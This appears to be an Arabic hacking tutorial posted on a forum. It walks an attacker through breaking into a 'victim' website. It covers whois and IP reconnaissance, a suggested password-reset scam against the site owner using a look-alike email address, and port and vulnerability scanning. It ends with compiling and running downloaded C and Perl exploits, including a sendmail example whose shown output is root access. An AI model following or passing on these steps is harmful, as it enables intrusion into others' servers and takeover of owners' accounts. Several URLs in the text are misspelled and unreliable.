نظريات متفرقة ودروس في إختراق المواقع

الكاتب : Hanck_Joney

في هذا الجزء سوف ندرس كيف نتعقب آثار المواقع ... أو بمعنى آخر جمع معلومات عن الموقع الضحية ...

في البداية وأول خطوة يقوم بها أي قرصان لبدء هجومه على شبكة ... فإنه يجري عملية استعلام لمعرفة معلومات قيمة عن الموقع ... ويوفر لك الموقع
http://www.allwhois.com
خدمة جيدة لاستعلام المواقع ... قم باستعلام الموقع منه
الآن وبعد الاستعلام سوف تعرف في أي مكان يوجد هذا الخادم
قم باختيار موقع للاستعلام في نفس مكان الخادم لاستعلام أدق وأفضل ...

المعلومات التي تحصل عليها من الاستعلام كثيرة جدا ومهمة بشكل كبير ... خاصة تلك المعلومات الشخصية عن صاحب الموقع . يمكنك مثلا إنشاء بريد باسم مقارب لاسم صاحب الموقع ... ومن ثم مراسلة الشركة التي تم إنشاء بريده عليها وإخبارهم أنك قد نسيت كلمة السر ... (أكمل بنفسك)...

من الآن سأفترض انك قمت باستعلام الموقع وانتهيت منه ...
يوفر لك مسجل الأرقام الأمريكي http://www.arin.com  خدمة ممتازة لاستعلام أرقام IP . بإمكانك الاستعلام عن أشخاص ... أو حتى جهاز خادم ...
فقط قم بالحصول على رقم الـ IP , وقم بإجراء الاستعلام ...

الآن سنعرف كيف تفحص الموقع بحثا عن وصلة معينة فيه ...
بإمكانك استخدام محرك البحث http://Astalavista.box.sk
والقيام بالبحث عن وصلة معينة داخل موقع ما ولنفرض أنه www.10pht.com
ابحث في محرك البحث المذكور عن التالي
link:www.10pht.com and hacking
كمثال...

من الآن سوف أفترض أنك تستخدم نظام لينوكس للآتي
إن أردت معرفة صناديق البريد الموجودة على موقع ما استخدم التالي
$ whois "@Acme.net"@whois.internic.net
في هذا المثال ... طلبنا من مزود خدمة الاستعلام
internic.net
أن يعطينا جميع صناديق البريد الموجودة على الموقع
Acme.net
لاحظ أننا في حالة أجرينا استعلام فإننا نكتب الدومين فقط...

بإمكانك أيضا استعلام قواعد بيانات البريد من الموقع  http://www.sec.gov/edgar
ويحوي هذا الموقع أكبر قواعد البيانات ... ستفيدك حتما

وهناك أنواع عديدة جدا تندرج تحت هذا القسم ذكرت لك بعضها في نهاية هذا القسم
أنصحك ببرنامج
NetScanTools
من
http://www.nwpsw.com/
=============================================================
في هذا القسم سوف ندرس المسح ... أو ما يسمى بالـ scan

في البداية ... سوف نقوم بعمل مسح لمعرفة المنافذ المفتوحة على الموقع , هناك عدة برامج لهذا العمل... منها برنامج super scan لنظام ويندوز .. وبرنامج nmap
لمستخدمين لينوكس أو يونيكس ...
( http://www.inscure.org/nmap )
( http://packetstormsecurity.org )
في الأداة nmap  بإمكانك عمل أكثر من عملية مسح على موقع ...
مثلا ... تعرف على نظام تشغيله ... بالإضافة إلى ميزات لن تجدها في غيره ...
بعد تثبيته اكتب
$ nmap
وسوف ترى الميزات التي يوفرها لك ...

هناك برنامج
Shadow Security Scanner
والذي يعد من أفضل البرامج على ويندوز على الإطلاق ...
تجده هنا
http://www.rsh.kiev.ua/SSS.exe
عمله هو مسح كامل لمعرفة المنافذ والثغرات والبرامج بإصداراتها ...
وبإمكانك أن تجد
Nessus
برنامج ماسح ثغرات أمنية مجاني من الموقع
http://wwww.nessus.org
لنظام ويندوز ومستخدمين لينوكس ...

الآن سننتقل إلى كيفية معرفة نظام التشغيل ...
بكل بساطة ... سوف أوفر عليك استخدام الأدوات وووو... الخ
قم باستخدام الموقع
http://wwww.netcraft.com
سوف تجد الخدمة
What's the site running
أفضل أن تستخدمها ...
إن لم تود فهناك برامج عديدة منها
queso
nmap
لمعرفة نظام التشغيل ...
=============================================================

كيف نبحث عن ثغرات ...
هذا الجزء أكبر من أن يوضع في كتاب ... وملفي هذا عبارة عن درس مطول ... لذلك سوف أحاول أن أكتب هذا المقطع بالمختصر المفيد

هناك العديد من البرامج لمعرفة ثغرات الموقع ...
في الحقيقة برنامجي المفضل هو  http://www.rsh.kiev.ua/SSS.exe
بإمكانك أيضا استخدام البرنامج  Nessus  من الموقع  http://wwww.nessus.org

بعد العثور على ثغرة ما في موقع ... قم بالذهاب إلى أحد الموقعين التاليين
http://packetstormsecurity.org
http://www.rootshell.com
للبحث عن ثغرات للبرنامج ... إذهب للموقع الثاني أولا فهو أصغر ... إن لم تجد إذهب للأول فهو الأفضل والأكبر ...
إن لم تجد في الموقعين إبحث هنا  http://www.google.com

لنترك البحث ونركز على الاستخدام ... إن كنت وجدت أحد هذه الثغرات
PHP - CGI - UNICODE - VB ... etc  فاستغلالها يتم من المتصفح ...

إن وجدت سيكربتات مكتوبة بلغة السي لإستثمار ثغرة ما فاستخدامها كالتالي
أولا : قم بتحويلها إلى ملف تنفيذي بواسطة الأمر
gcc -o file file.c
مثلا
gcc -o wuftpd-2.6.0 wuftpd-2.6.0.c
وبعد أن يتم التحويل قم باستخدامها بالأمر
./wuftpd-2.6.0
وسوف تظهر لك طريقة الإستعمال ... مثلا
$ gcc -o sendmail sendmail.c
$ ./sendmail
Usage : sendmail <host> <OS> <user> <password>
$ ./sendmail smtp.targetdomain.com RedHat-6.2 anonymous anonymous
connecting to host...
connected...
id
uid=0(root) gid=0(root)

لاحظ أن في هذه الثغرة طلب اسم ملقم البريد الذي يشغل برنامج
sendmail
ونظام التشغيل وكذلك اسم مستخدم وكلمة مرور ...
بعد أن نفذنا هذا ... قام البرنامج بتنفيذ هجوم طفح الدارئ وأعطانا امتيازات root

قد تجد أحيانا سيكربت خاص بثغرة ما مكتوب بلغة Perl
استخدامه كالآتي
./file.pl
إن أعطاك الرسالة
Access Denied
اكتب الأمر
chmod +x file.pl
وقم بتشغيله مرة أخرى
هنا مثالين لملف قام بالعمل بشكل صحيح وآخر أظهر رسالة الخطأ المذكورة
$ ./apache.pl
Usage: apache <host> <port> <file>
كما ترى قام بالعمل بشكل صحيح ... لنرى المثال الآخر
$ ./ftpd.pl
Access Denied.
$ chmod +x ftpd.pl
$ ./ftpd.pl
Usage: <host> <OS> <user> <password>
host target host name
OS:
1 Linux Red Hat 6.2
2 OpenLinux 2.3
[so on]

لاحظ أن الملف قام بالعمل بشكل صحيح في المرة الثانية

وفي ختام هذا الملف إن كنت صاحب موقع أحب أن أقول لك
(don't be lamer, be secure!)